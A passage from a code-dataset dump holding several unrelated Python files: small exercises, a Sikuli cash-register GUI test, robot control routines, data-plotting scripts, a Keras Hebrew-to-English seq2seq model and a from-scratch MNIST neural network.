\n\"\"\"\nheight = 8\nmaxspan = (height-1)*2-1\nlastNumberOfStars = 0\nline = \"\"\n\n# build the tree from top to down\nfor x in range(height):\n \n if lastNumberOfStars == 0:\n currentNumberOfStars = 1\n else:\n currentNumberOfStars = lastNumberOfStars + 2\n\n # check if this is the last line\n # print the trunk of the tree\n if x == height-1:\n currentNumberOfStars = 3\n\n numberOfSpaces = maxspan - currentNumberOfStars\n numberOfSpacesPerSide = int(numberOfSpaces / 2)\n for x in range(numberOfSpacesPerSide):\n line = line + \" \"\n for x in range(currentNumberOfStars):\n line = line + \"*\"\n for x in range(numberOfSpacesPerSide):\n line = line + \" \"\n lastNumberOfStars = currentNumberOfStars\n\n print(line)\n line = \"\"","sub_path":"01_christmastree/christmastree.py","file_name":"christmastree.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"213961160","text":"def print_lists(listing, params=()):\n # Prints all lists.\n print('\\nYour lists:')\n for i in listing.keys():\n print(' ---> ', i)\n\n return listing\n\n\ndef print_items(listing, params=()):\n # Prints all items in chosen list.\n if not params:\n # Yeah, I know. It is called KOSTYL\n selected = (select_list(listing),) if select_list(listing) else None\n else:\n selected = check_params_list(listing, params, 1)\n\n if selected:\n for key, value in listing[selected[0]].items():\n print(' ---> {0} : {1}'.format(key, value))\n\n return listing\n\n\ndef select_list(listing):\n # Returns selected list.\n while listing:\n print_lists(listing)\n selected_list = input('\\nChoose list --> ')\n if selected_list in listing:\n return selected_list\n\n\ndef select_item(listing, sel_li):\n # Returns selected item in list.\n if sel_li in listing:\n while listing[sel_li]:\n print_items(listing, (sel_li,))\n selected_item = input('\\nChoose item --> ')\n if selected_item in listing[sel_li]:\n return (sel_li, selected_item)\n\n\ndef create_list(listing):\n # Creates list\n while True:\n new_list = input('\\nCreate list name. --> ')\n if new_list not in listing:\n return new_list\n print('This name already exists.')\n\n\ndef create_item(listing, selected_list_and_item):\n # Creates items to list\n while selected_list_and_item:\n new_item = input('\\nCreate item name. 
--> ')\n        if new_item not in listing[selected_list_and_item[0]]:\n            return (selected_list_and_item[0], selected_list_and_item[1],\n                    new_item)\n        print('This name already exists.')\n\n\ndef check_params_list(listing, params, args):\n    # Checks if the list is in listing and there are enough arguments.\n    if (params[0] in listing) and (len(params) >= args):\n        return params\n\n\ndef check_params_item(listing, params, args):\n    # Checks if the item is in the list and there are enough arguments.\n    if (params[0] in listing) and (len(params) >= args):\n        if params[1] in listing[params[0]]:\n            return params\n","sub_path":"listfuncs.py","file_name":"listfuncs.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"565242497","text":"from sikuli import *\nimport general_functions\nimport general_buttons\nimport test_cases\nimport test_settings\nimport time\nimport gui_screens\n\nglobal l_general_test_settings\nl_general_test_settings = test_settings.general_test_settings( )\nglobal brand\nbrand = l_general_test_settings[6]\nglobal locale\nlocale = l_general_test_settings[8]\nglobal l_base_dir\nl_base_dir = l_general_test_settings[10]\nglobal is_gui_test\nis_gui_test = l_general_test_settings[11]\nglobal country\ncountry = l_general_test_settings[13]\nglobal l_test_settings\nl_test_settings = test_settings.pay_in( )\n\n\ndef pay_in():\n    general_functions.errorhandling(\"ABORT\")\n    general_functions.start_of_test_case('pay in')\n    general_functions.extended_wait(\"main_page_key_pad\", 300)\n\n    # TEST CASE\n    if is_gui_test == 'YES':\n        gui_screens.check_gui_element('main_page')\n\n    for z in range(0, l_test_settings[0]):\n\n        general_buttons.main_page_footer_menu_btns_click('OTHER')\n\n        # TEST CASE\n        if is_gui_test == 'YES':\n            gui_screens.check_gui_element('other_screen')\n\n        general_buttons.main_page_other_menu_btns_click('PAY-IN')\n\n        # four eyes authorization\n        general_functions.four_eyes(l_general_test_settings[4], l_general_test_settings[5])\n\n        # select the pay-in reason\n\n        print('list item: ' + 'LIST ITEM ' + str(z + 1))\n        general_buttons.click_in_list('LIST ITEM ' + str(z + 1))\n\n        # TEST CASE\n        if is_gui_test == 'YES':\n            gui_screens.check_gui_element('pay_in_reasons')\n\n        # confirm reason\n        type(Key.ENTER)\n\n        # TEST CASE\n        if is_gui_test == 'YES':\n            gui_screens.check_gui_element('pay_in_total_amount_screen')\n\n        # amount that is paid in\n        type(str(z + 1) + '.00')\n\n        # confirm amount\n        type(Key.ENTER)\n\n        wait(3)\n\n        receipt_meta_data_array = general_functions.get_receipt_meta_data( )\n\n        # click CASH button\n        general_buttons.pay_out_key_pad_click('CASH')\n\n        # confirm the pay-in\n        type(Key.ENTER)\n\n        general_functions.close_drawer_msg( )\n\n        general_functions.start_of_test_case('pay in ' + 'LIST ITEM ' + str(z + 1))\n\n    general_functions.start_of_test_case('cancel pay in')\n\n    general_buttons.main_page_footer_menu_btns_click('OTHER')\n\n    # TEST CASE\n    if is_gui_test == 'YES':\n        gui_screens.check_gui_element('other_screen')\n\n    general_buttons.main_page_other_menu_btns_click('PAY-IN')\n\n    # four eyes authorization\n    general_functions.four_eyes(l_general_test_settings[4], l_general_test_settings[5])\n\n    # select and confirm the pay-in reason\n    # general_functions.general_message('select pay-in reason')\n    type(Key.ENTER)\n\n    # TEST CASE\n    if is_gui_test == 'YES':\n        gui_screens.check_gui_element('pay_in_reasons')\n\n    # type the amount that is paid in\n    # general_functions.general_message('type the amount to pay in')\n    
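# (Sikuli's type() sends these keystrokes to whatever field currently has focus)\n    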
type(\"9.99\")\n\n # TEST CASE\n if is_gui_test == 'YES':\n gui_screens.check_gui_element('pay_in_total_amount_screen')\n\n # confirm amount\n # general_functions.general_message('confirm amount')\n type(Key.ENTER)\n\n wait(3)\n\n # get receipt data and save it\n receipt_meta_data_array = general_functions.get_receipt_meta_data( )\n\n # click CANCEL TRANSACTION button\n # general_functions.general_message('CANCEL')\n general_buttons.basket_page_key_pad_btns_click('CANCEL')\n\n # four eyes authorization\n general_functions.four_eyes(l_general_test_settings[4], l_general_test_settings[5])\n\n type(Key.ENTER)\n type(Key.ENTER)\n\n # general_functions.general_message('end of payout')\n\n general_functions.end_of_test_case( )","sub_path":"pay_in.sikuli/pay_in.py","file_name":"pay_in.py","file_ext":"py","file_size_in_byte":3705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"365002697","text":"import rosebot\nimport time\ndef go_and_get_some_water(speed):\n robot=rosebot.RoseBot()\n robot.arm_and_claw.calibrate_arm()\n robot.sound_system.speech_maker.speak(\"Are you thirsty now\").wait()\n while True:\n if robot.sensor_system.touch_sensor.is_pressed():\n robot.drive_system.spin_clockwise_until_sees_object(speed,1200)\n robot.drive_system.go_forward_until_distance_is_less_than(0.4,speed)\n break\n robot.arm_and_claw.move_arm_to_position(3000)\n\ndef stop_and_ask():\n robot=rosebot.RoseBot()\n robot.sound_system.speech_maker.speak(\"Oh you don't want water\").wait()\n while True:\n if robot.sensor_system.touch_sensor.is_pressed():\n break\n robot.drive_system.stop()\n robot.arm_and_claw.lower_arm()\n robot.sound_system.speech_maker.speak(\"Call me if you are thirsty\").wait()\n\ndef go_back_and_give_me_the_water(speed):\n robot=rosebot.RoseBot()\n robot.sound_system.speech_maker.speak(\"Now I get the water\").wait()\n while True:\n robot.drive_system.right(speed,speed)\n if robot.sensor_system.color_sensor.get_reflected_light_intensity()<=20:\n robot.drive_system.stop()\n break\n robot.arm_and_claw.lower_arm()\n robot.sound_system.speech_maker.speak(\"Now you can enjoy your water\").wait()\n\n\n\n\n\n\n\n","sub_path":"src/m2_extra.py","file_name":"m2_extra.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"271543990","text":"class Solution:\n def maxSubarray(self, nums):\n\n size = len(nums)\n \n for i in range(1, size):\n if nums[i-1] > 0:\n nums[i] += nums[i-1]\n \n return max(nums)\n \n\nif __name__=='__main__':\n arg1 = [-2, 1, -3, 4, -1, 2, 1, -5, 4]\n res = Solution().maxSubarray(arg1)\n print(res)\n\n","sub_path":"E_maximum_subarray/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"571853094","text":"import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom datetime import datetime, timedelta\nimport random\nfrom matplotlib.colors import ListedColormap\nfrom plot_cowNumber import getEidDict\nimport csv\nfrom videoLibs import decomposeFrameNamePts\n\nstartDate = datetime(2020,4,9)\nendDate = datetime(2020,8,21)\n\nblack='#000000'\ngreen='#6acc64'\nred='#e74c3c'\n\nmycolors=[black # NO_FRAMR=0\n ,green # NUMBER_OF_FRAMES=1\n ,red # NUMBER_OF_FRAMES>1\n ]\n\ndef dateRange(date1, date2):\n dateList = []\n for n in range(int ((date2 - date1).days)+1):\n 
dateList.append(date1 + timedelta(n))\n # aaa = [datetime.strptime(day) for day in dateList]\n return dateList \n\ndef getEidAppearedDays(eidListFile):\n eidDict = {}\n with open(eidListFile) as csvfile:\n csvReader = csv.reader(csvfile)\n for row in csvReader:\n eidFolderPath = row[0] \n eid = os.path.basename(eidFolderPath)\n _,_,files = next(os.walk(eidFolderPath))\n days = [decomposeFrameNamePts(frame)['day'] for frame in files]\n eidDict[eid] = days\n return eidDict\n\ndef covertToSameLength(dictIn, dates):\n numOfDays = len(dates)\n dictOut = {}\n for eid, appearedDays in dictIn.items():\n dictOut[eid] = zerolistmaker(numOfDays)\n for day in appearedDays:\n index = dates.index(day)\n dictOut[eid][index] = dictOut[eid][index] + 1\n return dictOut\n\ndef zerolistmaker(n):\n listofzeros = [0] * n\n return listofzeros\n\ndef plot_heatmap(df, eidListFile):\n figHeight = len(df)*0.3\n cmap = ListedColormap(mycolors)\n sns.set(rc={'figure.figsize':(20,figHeight)})\n ax = sns.heatmap(df,cmap=cmap, linewidths=0.01, linecolor='#5d5d5d',cbar=False)\n title = os.path.basename(eidListFile).split('.')[0]\n ax.set(title = title)\n plt.savefig('heatmap_1369_'+ title.split('_')[-1] + '.png')\n\ndef eidListToDf(eidListFile):\n dates = [day.strftime(\"%Y%m%d\") for day in dateRange(startDate,endDate)]\n eidAppearedDays = getEidAppearedDays(eidListFile)\n eidAppearedDays_sameLength = covertToSameLength(eidAppearedDays, dates) \n df = pd.DataFrame(eidAppearedDays_sameLength,index = dates).transpose()\n df[df>2] = 2\n return df\n\ndef getFileList(filePath):\n aList = []\n with open(filePath) as csvFile:\n csvReader = csv.reader(csvFile)\n for row in csvReader:\n aList.append(row[0])\n return aList\n\ndef main():\n # For a single file:\n eidListFile = '/data/gpueval/imageProcessing/peguo0/cowFace/outputImages/cowList_1369_sorted.txt'\n df = eidListToDf(eidListFile)\n plot_heatmap(df, eidListFile)\n\n # # For a batch:\n # eidFilesPath = '/data/gpueval/imageProcessing/peguo0/cowFace/outputImages/cowList_files.txt'\n # eidFiles = getFileList(eidFilesPath)\n # for eidListFile in eidFiles: \n # df = eidListToDf(eidListFile)\n # plot_heatmap(df, eidListFile)\n \n \n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"plot_heatmap_cowNumber.py","file_name":"plot_heatmap_cowNumber.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"636510536","text":"from keras.models import model_from_json\nfrom keras.models import Model\nfrom keras.layers import Input, LSTM, Dense\nimport numpy as np\n\nbatch_size = 64 # Batch size for training.\nepochs = 2 # Number of epochs to train for.\nlatent_dim = 256 # Latent dimensionality of the encoding space.\nnum_samples = 1000 # Number of samples to train on.\n\ndata_path = 'data/hebASCII.txt' # Path to the data txt file on disk.\n\n\n# Turn the data to vectors\ninput_texts = []\ntarget_texts = []\ninput_characters = set()\ntarget_characters = set()\nlines = open(data_path).read().split('\\n')\nfor line in lines[: min(num_samples, len(lines) - 1)]:\n input_text, target_text = line.split('\\t')\n # I use \"tab\" as the \"start sequence\" character\n # for the targets, and \"\\n\" as \"end sequence\" character.\n target_text = '\\t' + target_text + '\\n'\n input_texts.append(input_text)\n target_texts.append(target_text)\n for char in input_text:\n input_characters.update(char)\n # if char not in input_characters:\n # input_characters.add(char)\n for char in target_text:\n 
target_characters.update(char)\n # if char not in target_characters:\n # target_characters.add(char)\n\ninput_characters = sorted(list(input_characters))\ntarget_characters = sorted(list(target_characters))\nnum_encoder_tokens = len(input_characters)\nnum_decoder_tokens = len(target_characters)\nmax_encoder_seq_length = max([len(txt) for txt in input_texts])\nmax_decoder_seq_length = max([len(txt) for txt in target_texts])\n\nprint('Number of samples:', len(input_texts))\nprint('Number of unique input tokens:', num_encoder_tokens)\nprint('Number of unique output tokens:', num_decoder_tokens)\nprint('Max sequence length for inputs:', max_encoder_seq_length)\nprint('Max sequence length for outputs:', max_decoder_seq_length)\n\ninput_token_index = dict([(char, i) for i, char in enumerate(input_characters)])\ntarget_token_index = dict([(char, i) for i, char in enumerate(target_characters)])\n\nencoder_input_data = np.zeros((len(input_texts), max_encoder_seq_length, num_encoder_tokens), dtype='float32')\ndecoder_input_data = np.zeros((len(input_texts), max_decoder_seq_length, num_decoder_tokens), dtype='float32')\ndecoder_target_data = np.zeros((len(input_texts), max_decoder_seq_length, num_decoder_tokens), dtype='float32')\n\n\nfor i, (input_text, target_text) in enumerate(zip(input_texts, target_texts)):\n for t, char in enumerate(input_text):\n encoder_input_data[i, t, input_token_index[char]] = 1.\n for t, char in enumerate(target_text):\n # decoder_target_data is ahead of decoder_input_data by one time step\n decoder_input_data[i, t, target_token_index[char]] = 1.\n if t > 0:\n # decoder_target_data will be ahead by one time step and will not include the start character\n decoder_target_data[i, t - 1, target_token_index[char]] = 1.\n\n#---------------------------------------------------------------------------------------------------------------------#\n# Define an input sequence and process it\nencoder_inputs = Input(shape=(None, num_encoder_tokens))\nencoder = LSTM(latent_dim, return_state=True)\nencoder_outputs, state_h, state_c = encoder(encoder_inputs)\n# I discard `encoder_outputs` and only keep the states.\nencoder_states = [state_h, state_c]\n\n# Set up the decoder, using `encoder_states` as initial state.\ndecoder_inputs = Input(shape=(None, num_decoder_tokens))\n# I set up our decoder to return full output sequences, and to return internal states as well. 
I don't use the\n# return states in the training model, but I will use them in inference.\ndecoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)\ndecoder_outputs, _, _ = decoder_lstm(decoder_inputs, initial_state=encoder_states)\ndecoder_dense = Dense(num_decoder_tokens, activation='softmax')\ndecoder_outputs = decoder_dense(decoder_outputs)\n\n# Define the model that will turn\n# `encoder_input_data` & `decoder_input_data` into `decoder_target_data`\nmodel = Model([encoder_inputs, decoder_inputs], decoder_outputs)\n\n# Run training\nmodel.compile(optimizer='rmsprop', loss='categorical_crossentropy')\nmodel.fit([encoder_input_data, decoder_input_data], decoder_target_data,\n batch_size=batch_size, epochs=epochs, validation_split=0.2)\n# Save model\n# serialize model to JSON\nmodel_json = model.to_json()\njson_path = 'trained_models/heb-eng_model.json'\nh5_path = 'trained_models/heb-eng_model.h5'\nwith open(json_path, \"w\") as json_file:\n json_file.write(model_json)\n# serialize weights to HDF5\nmodel.save_weights(h5_path)\nprint(\"Saved model to disk\")\n\n#---------------------------------------------------------------------------------------------------------------------#\n# Define sampling models\nencoder_model = Model(encoder_inputs, encoder_states)\ndecoder_state_input_h = Input(shape=(latent_dim,))\ndecoder_state_input_c = Input(shape=(latent_dim,))\ndecoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]\ndecoder_outputs, state_h, state_c = decoder_lstm(decoder_inputs, initial_state=decoder_states_inputs)\ndecoder_states = [state_h, state_c]\ndecoder_outputs = decoder_dense(decoder_outputs)\ndecoder_model = Model([decoder_inputs] + decoder_states_inputs, [decoder_outputs] + decoder_states)\n\n# Reverse-lookup token index to decode sequences back to something readable.\nreverse_input_char_index = dict((i, char) for char, i in input_token_index.items())\nreverse_target_char_index = dict((i, char) for char, i in target_token_index.items())\n\ndef decode_sequence(input_seq):\n # Encode the input as state vectors.\n states_value = encoder_model.predict(input_seq)\n\n # Generate empty target sequence of length 1.\n target_seq = np.zeros((1, 1, num_decoder_tokens))\n # Populate the first character of target sequence with the start character.\n target_seq[0, 0, target_token_index['\\t']] = 1.\n\n # Sampling loop for a batch of sequences(to simplify, here we assume a batch of size 1).\n stop_condition = False\n decoded_sentence = ''\n while not stop_condition:\n output_tokens, h, c = decoder_model.predict(\n [target_seq] + states_value)\n\n # Sample a token\n sampled_token_index = np.argmax(output_tokens[0, -1, :])\n sampled_char = reverse_target_char_index[sampled_token_index]\n decoded_sentence += sampled_char\n\n # Exit condition: either hit max length or find stop character.\n if (sampled_char == '\\n' or\n len(decoded_sentence) > max_decoder_seq_length):\n stop_condition = True\n\n # Update the target sequence (of length 1).\n target_seq = np.zeros((1, 1, num_decoder_tokens))\n target_seq[0, 0, sampled_token_index] = 1.\n\n # Update states\n states_value = [h, c]\n\n return decoded_sentence\n\n#---------------------------------------------------------------------------------------------------------------------#\nfor seq_index in range(100):\n # Take one sequence (part of the training test) for trying out decoding.\n input_seq = encoder_input_data[seq_index: seq_index + 1]\n decoded_sentence = decode_sequence(input_seq)\n print('-')\n print('Input 
sentence:', input_texts[seq_index])\n    print('Decoded sentence:', decoded_sentence)\n\n# load trained model - json and h5 weights model\nwith open(json_path, 'r') as f:\n    loaded_model_json = f.read()\nloaded_model = model_from_json(loaded_model_json)\n# load weights into new model\nloaded_model.load_weights(h5_path)\nprint(\"Loaded model from disk\")\n\n# evaluate loaded model on test data (same categorical loss as in training)\nloaded_model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\nscore = loaded_model.evaluate([encoder_input_data, decoder_input_data], decoder_target_data, verbose=0)\nprint(\"%s: %.2f%%\" % (loaded_model.metrics_names[1], score[1]*100))","sub_path":"Heb2Eng - Keras.py","file_name":"Heb2Eng - Keras.py","file_ext":"py","file_size_in_byte":7812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"294671803","text":"# Standard libraries\nimport gzip\nimport pickle\nimport random\nimport json\n\n# Third-party libraries\nimport numpy as np\n\n\nclass Network(object):\n\n\tdef __init__(self, sizes):\n\t\t\"\"\"The list sizes holds the number of layers and the number of neurons in each layer.\n\t\tFor example, [784, 30, 10] is a network with a 784-neuron input layer,\n\t\tone hidden layer of 30 neurons, and a 10-neuron output layer.\n\t\t\"\"\"\n\t\tself.num_layers = len(sizes)\n\t\tself.sizes = sizes\n\t\tself.learning_rate = 0.1\n\t\tself.lmbda = 0.1\n\t\tself.weight_initialization()\n\t\tself.load_data()\n\n\tdef weight_initialization(self):\n\t\t\"\"\"np.random.randn() returns numbers drawn from a Gaussian distribution with mean 0\n\t\tand standard deviation 1. To pull the generated numbers closer to 0,\n\t\twe divide every generated weight by the square root of the total number of neurons in that layer.\n\t\tWe want the weights near zero because the derivative of the sigmoid takes its largest values around 0,\n\t\twhich speeds up learning.\n\t\tWhy not simply take zeros? Because then we would remove nearly all randomness from the learning\n\t\tprocess and risk getting stuck in a local minimum of the cost function.\n\t\t\"\"\"\n\t\tself.biases = [np.random.randn(y, 1) for y in self.sizes[1:]]\n\t\tself.weights = [np.random.randn(y, x)/np.sqrt(x)\n\t\t\t\t\t\tfor x, y in zip(self.sizes[:-1], self.sizes[1:])]\n\n\tdef load_data(self):\n\t\t\"\"\"Load 50 thousand handwritten digits with their answers, 10 thousand 
validation images and 10 thousand\n\t\ttest images.\n\t\t\"\"\"\n\t\tf = gzip.open('mnist.pkl.gz', 'rb')\n\t\ttraining_data, validation_data, test_data = pickle.load(f, encoding=\"latin1\")\t\t\n\t\tf.close()\n\t\tself.training_data = self.preparing_data(training_data)\n\t\tself.validation_data = self.preparing_data(validation_data)\n\t\tself.test_data = self.preparing_data(test_data)\n\n\tdef preparing_data(self, data):\n\t\t\"\"\"Convert the data into a form that is convenient to work with later.\n\t\t\"\"\"\n\t\tinputs = [np.reshape(x, (784, 1)) for x in data[0]]\n\t\tresults = [self.vectorized_result(y) for y in data[1]]\n\t\tdata = zip(inputs, results)\n\t\treturn list(data)\n\n\tdef vectorized_result(self, j):\n\t\t\"\"\"Convert the result, which comes as a digit from 0 to 9, into a ten-dimensional\n\t\tvector that is all zeros except for a 1 at the index of the result.\n\t\t\"\"\"\n\t\te = np.zeros((10, 1))\n\t\te[j] = 1.0\n\t\treturn e\n\n\tdef learning(self, epochs, mini_batch_size, eta, lmbda):\n\t\tfor j in range(epochs):\n\t\t\trandom.shuffle(self.training_data)\n\t\t\tmini_batches = [\n\t\t\t\tself.training_data[k:k+mini_batch_size]\n\t\t\t\tfor k in range(0, len(self.training_data), mini_batch_size)]\n\t\t\tfor mini_batch in mini_batches:\n\t\t\t\tself.gradient_step(\n\t\t\t\t\tmini_batch, eta, lmbda, len(self.training_data))\n\n\t\t\tprint(\"Epoch %s training complete,\" % (j+1), \" accuracy on test data - \", self.evaluate(self.test_data), \"%\")\n\t\tprint(\"Accuracy on training data - \", self.evaluate(self.training_data), \"%\")\n\t\tprint(\"Accuracy on validation data - \", self.evaluate(self.validation_data), \"%\")\t\n\n\tdef gradient_step(self, mini_batch, eta, lmbda, n):\n\t\t\"\"\"\n\t\tUpdate the weights and biases from the gradients computed on a single mini-batch.\n\n\t\t\"\"\"\n\t\tnabla_b = [np.zeros(b.shape) for b in self.biases]\n\t\tnabla_w = [np.zeros(w.shape) for w in self.weights]\n\t\tfor x, y in mini_batch:\n\t\t\tdelta_nabla_b, delta_nabla_w = self.backprop(x, y)\n\t\t\tnabla_b = [nb+dnb for nb, dnb in zip(nabla_b, delta_nabla_b)]\n\t\t\tnabla_w = [nw+dnw for nw, dnw in zip(nabla_w, delta_nabla_w)]\n\t\t\"\"\"\n\t\tThe expression (1-eta*(lmbda/n)) is the regularization term, which shrinks the weights.\n\t\tThe cross-entropy cost can lead to overtraining the network. 
The weights become\n\t\tlarge and we get a higher error on the validation data.\n\t\tThis expression is close to 0.9 - it constantly shrinks the weights a little and protects\n\t\tthe network from overfitting.\n\n\t\t\"\"\"\n\t\tself.weights = [(1-eta*(lmbda/n))*w-(eta/len(mini_batch))*nw\n\t\t\t\t\t\tfor w, nw in zip(self.weights, nabla_w)]\n\t\tself.biases = [b-(eta/len(mini_batch))*nb\n\t\t\t\t\t   for b, nb in zip(self.biases, nabla_b)]\n\n\tdef backprop(self, x, y):\n\t\t\"\"\" Using backpropagation of the error, we compute the gradient that is then used to\n\t\tupdate the weights and biases.\n\t\tIt rests on the four key equations:\n\t\tδ^L = ∇aC ⦿ σ'(z^L)\n\t\tδ^l = (w^(l+1)T * δ^(l+1)) ⦿ σ'(z^l)\n\t\tdC/db = δ^l\n\t\tdC/dw = a^(l-1) * δ^l\n\t\tIn our case, instead of the derivative of the quadratic cost we use\n\t\tthe cross-entropy cost function.\n\t\t\"\"\"\n\t\tnabla_b = [np.zeros(b.shape) for b in self.biases]\n\t\tnabla_w = [np.zeros(w.shape) for w in self.weights]\n\t\tactivation = x\n\t\tactivations = [x] \n\t\tzs = []\n\t\tfor b, w in zip(self.biases, self.weights):\n\t\t\tz = np.dot(w, activation)+b\n\t\t\tzs.append(z)\n\t\t\tactivation = self.sigmoid(z)\n\t\t\tactivations.append(activation)\n\t\t# Backward pass\n\t\tdelta = self.cross_entropy_cost(activations[-1], y)\n\t\tnabla_b[-1] = delta\n\t\tnabla_w[-1] = np.dot(delta, activations[-2].transpose())\n\n\t\tfor l in range(2, self.num_layers):\n\t\t\tz = zs[-l]\n\t\t\tsp = self.sigmoid_prime(z)\n\t\t\tdelta = np.dot(self.weights[-l+1].transpose(), delta) * sp\n\t\t\tnabla_b[-l] = delta\n\t\t\tnabla_w[-l] = np.dot(delta, activations[-l-1].transpose())\n\t\treturn (nabla_b, nabla_w)\t\t\n\n\tdef feedforward(self, a):\n\t\t\"\"\"Pass a single image through the network and get a ten-dimensional result vector.\n\t\tThe index of the largest value in that vector is the network's answer for which digit is shown.\n\t\t\"\"\"\n\t\tfor b, w in zip(self.biases, self.weights):\n\t\t\ta = self.sigmoid(np.dot(w, a)+b)\n\t\treturn a\n\n\tdef cross_entropy_cost(self, a, y):\n\t\t\"\"\"Compute the derivative of the (cross-entropy) cost function.\n\t\tThe formula of the cross-entropy cost itself is:\n\t\tnp.sum(np.nan_to_num(-y*np.log(a)-(1-y)*np.log(1-a)))\n\t\tUnlike the cost function, which gives an absolute value,\n\t\tthe derivative gives the rate of change of the function at the given point.\n\t\t\"\"\"\n\t\treturn (a-y)\t\n\n\tdef sigmoid(self, z):\n\t\t\"\"\"Compute the sigmoid for every neuron. The sigmoid accepts inputs from minus infinity\n\t\tto plus infinity and outputs values between 0 and 1. Most of the change happens\n\t\tfor x between -6 and 6, and even more between -4 and 4. At x equal to 0 the sigmoid is 0.5,\n\t\tand at that same point its derivative takes its largest value, 0.25.\n\t\t\"\"\"\n\t\treturn 1.0/(1.0+np.exp(-z))\n\n\tdef sigmoid_prime(self, z):\n\t\t\"\"\"Compute the derivative of the sigmoid. The derivative shows the rate of change of the function. 
\n\t\tIts maximum value, 0.25, is reached when the input is zero.\n\t\t\"\"\"\n\t\treturn self.sigmoid(z)*(1-self.sigmoid(z))\t\n\n\tdef evaluate(self, data):\n\t\t\"\"\"Return the percentage of correct answers.\"\"\"\n\t\ttest_results = [(np.argmax(self.feedforward(x)), np.argmax(y))\n\t\t\t\t\t\tfor (x, y) in data]\n\t\taccuracy = sum(int(x == y) for (x, y) in test_results)\n\t\treturn float(accuracy/len(data)*100)\n\n\n\tdef save(self, filename):\n\t\t\"\"\"Save the results of training.\"\"\"\n\t\tdata = {\"sizes\": self.sizes,\n\t\t\t\t\"weights\": [w.tolist() for w in self.weights],\n\t\t\t\t\"biases\": [b.tolist() for b in self.biases],}\n\t\tf = open(filename, \"w\")\n\t\tjson.dump(data, f)\n\t\tf.close()\n\n\n#### Load a saved network\ndef load(filename):\n\t\"\"\"Return an instance of the Network class.\n\t\"\"\"\n\tf = open(filename, \"r\")\n\tdata = json.load(f)\n\tf.close()\n\tnet = Network(data[\"sizes\"])\n\tnet.weights = [np.array(w) for w in data[\"weights\"]]\n\tnet.biases = [np.array(b) for b in data[\"biases\"]]\n\treturn net\n\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":9623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"618752424","text":"# Imports and Initializations\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\ndef display_survivability():\r\n    figure = plt.figure(figsize=(18, 7))\r\n    grids = figure.add_gridspec(1, 2)\r\n    grids.update(wspace=0.3, hspace=0.15)\r\n    ax0 = figure.add_subplot(grids[0, 0])\r\n    ax1 = figure.add_subplot(grids[0, 1])\r\n\r\n    TITLE_AX0 = \"[ TARGET VALUE ]\\n___________\\n\\nSURVIVED RATE\"\r\n    ax0.text(0.5, 0.5, \r\n             TITLE_AX0,\r\n             horizontalalignment=\"center\",\r\n             verticalalignment=\"center\",\r\n             fontsize=28,\r\n             fontweight=\"bold\",\r\n             fontfamily=\"serif\",\r\n             color=\"#000000\")\r\n\r\n    ax0.set_xticklabels([]); ax0.set_yticklabels([])\r\n    ax0.tick_params(left=False, bottom=False)\r\n\r\n    ax_survived = ax1\r\n    sns.countplot(x=\"Survived\",\r\n                  color=\"gray\",\r\n                  data=df_utility,\r\n                  ax=ax_survived,\r\n                  palette=\"gist_gray\")\r\n    sns.despine()\r\n\r\n    ax0.spines[\"top\"].set_visible(False)\r\n    ax0.spines[\"left\"].set_visible(False)\r\n    ax0.spines[\"bottom\"].set_visible(False)\r\n    ax0.spines[\"right\"].set_visible(False)\r\n\r\n    plt.show();\r\n\r\ndef display_categorical_distributions(title=\"Categorical Features\", track_survivability=False):\r\n    figure = plt.figure(figsize=(18, 15))\r\n    grids = figure.add_gridspec(3, 3)\r\n    palette = \"gist_gray\"\r\n\r\n    ax0 = figure.add_subplot(grids[0, 0])\r\n    ax1 = figure.add_subplot(grids[0, 1])\r\n    ax2 = figure.add_subplot(grids[0, 2])\r\n    ax3 = figure.add_subplot(grids[1, 0])\r\n    ax4 = figure.add_subplot(grids[1, 1])\r\n\r\n    if track_survivability is True:\r\n        hue = \"Survived\"\r\n    else:\r\n        hue = None\r\n\r\n    ax_sex = ax0\r\n    sns.countplot(x=\"Sex\", hue=hue, data=df_utility, ax=ax_sex, palette=palette)\r\n    sns.despine()\r\n\r\n    ax_parch = ax1\r\n    sns.countplot(x=\"Parch\", hue=hue, data=df_utility, ax=ax_parch, palette=palette)\r\n    sns.despine()\r\n\r\n    ax_embarked = ax2\r\n    sns.countplot(x=\"Embarked\", hue=hue, data=df_utility, ax=ax_embarked, palette=palette)\r\n    sns.despine()\r\n\r\n    ax_pclass = ax3\r\n    sns.countplot(x=\"Pclass\", hue=hue, data=df_utility, ax=ax_pclass, palette=palette)\r\n    sns.despine()\r\n\r\n    ax_sibsp = ax4\r\n    sns.countplot(x=\"SibSp\", hue=hue, data=df_utility, ax=ax_sibsp, palette=palette)\r\n    
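# hue=\"Survived\" (set above only when track_survivability is True) splits every bar by outcome\r\n    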
